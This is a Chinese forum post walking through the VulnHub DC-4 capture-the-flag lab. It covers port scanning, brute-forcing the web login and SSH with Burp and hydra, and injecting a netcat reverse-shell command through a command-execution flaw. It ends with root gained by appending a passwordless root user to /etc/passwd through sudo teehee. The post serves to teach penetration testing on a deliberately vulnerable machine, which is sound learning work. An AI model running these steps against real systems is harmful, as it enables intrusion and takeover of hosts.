通关靶机DC-4

nicky   ·   发表于 1个月前   ·   技术文章投稿区

0x00:靶机下载

下载链接:https://www.vulnhub.com/entry/dc-4,313/

0x01:探测靶机

还是先用netdiscover 探测靶机,排除.1,.2可以确认靶机IP为192.168.184.142
命令:netdiscover -r 192.168.184.142

开始用nmap探测端口,不过只开了22和80
命令:nmap -A -sS -sV -v -p- 192.168.184.142

0x02:爆破登录框

访问80端口以后发现是个登录框页面,看来只能爆破了,尝试过SQL注入卒

开始抓包放到intruder里面跑(需要自备字典)最后跑到admin happy成功跑出来

0x03:命令执行漏洞

登录成功以后页面是这样的:

点了list files以后就跟ls效果一样会列出当前的目录

那么换成whoami也可以执行成功列出当前用户为www-data石锤当前存在命令执行漏洞

这样的话我们可以启用netcat创建一个反弹shell由于刚才抓包知道ls -l 是会变成ls+-l
原语句:nc -nv 192.168.184.133(kali IP) 2000 -e /bin/bash
变成 nc+-nv+192.168.184.133+2000+-e+/bin/bash

记得先提前开启kali端口

0x04:挖掘信息

这里不断浏览在/home/jim/backups/里面发现一堆密码信息

把这些密码信息复制保存下来,开始进行22端口爆破最后得到用户密码是jim jibril04
命令: hydra -l jim -P ./mima ssh://192.168.184.142

成功登陆以后继续挖掘信息,这次来到/var/mail目录下有封给charles的信顺便提供了密码

再次登录成功

0x05:提权

先sudo -l一波,发现可以以root权限运行/usr/bin/teehee同时查看了一下它的作用是将标准输入复制到每个FILE,也复制到标准输出。(谷歌翻译提供)其中 -a是一个附加文件,我们可以加上/etc/passwd然后创建一个新用户空密码的root权限

添加一个新用户为pikapi设置密码为空,在附上刚才要指定的文件可以构造一条语句,最后顺利拿到flag
格式为 [用户名]:[密码]:[uid]:[gid]

用户名金币积分时间理由
奖励系统 100.00 0 2020-08-10 09:09:32 投稿满 10 赞奖励
奖励系统 50.00 0 2020-08-09 10:10:38 投稿满 5 赞奖励
Track-聂风 60.00 0 2020-07-14 15:03:26 支持同学,期待你的新文章

打赏我,让我更有动力~

0 Reply   |  Until 1个月前 | 174 View
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3